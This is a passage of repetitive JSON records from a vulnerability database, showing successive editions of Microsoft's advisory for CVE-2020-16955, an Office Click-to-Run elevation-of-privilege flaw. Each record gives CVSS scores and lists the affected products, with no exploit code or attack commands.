"AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-17T04:46:12", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-16T12:44:15", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-16T12:44:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T04:46:12", "differentElements": ["msAffectedSoftware"], "edition": 50}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-17T10:52:29", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-16T12:44:15", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-16T12:44:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T10:52:29", "differentElements": ["msAffectedSoftware"], "edition": 51}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-17T12:43:15", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-16T12:44:15", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-16T12:44:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T12:43:15", "differentElements": ["msAffectedSoftware"], "edition": 52}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-17T16:50:14", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-16T12:44:15", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-16T12:44:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T16:50:14", "differentElements": ["msAffectedSoftware"], "edition": 53}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-17T18:43:48", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-16T12:44:15", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-16T12:44:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T18:43:48", "differentElements": ["msAffectedSoftware"], "edition": 54}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-17T20:54:49", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-16T12:44:15", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-16T12:44:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T20:54:49", "differentElements": ["msAffectedSoftware"], "edition": 55}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-17T22:48:06", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-16T12:44:15", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-16T12:44:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T22:48:06", "differentElements": ["msAffectedSoftware"], "edition": 56}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-18T00:49:42", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-16T12:44:15", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-16T12:44:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T00:49:42", "differentElements": ["msAffectedSoftware"], "edition": 57}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate 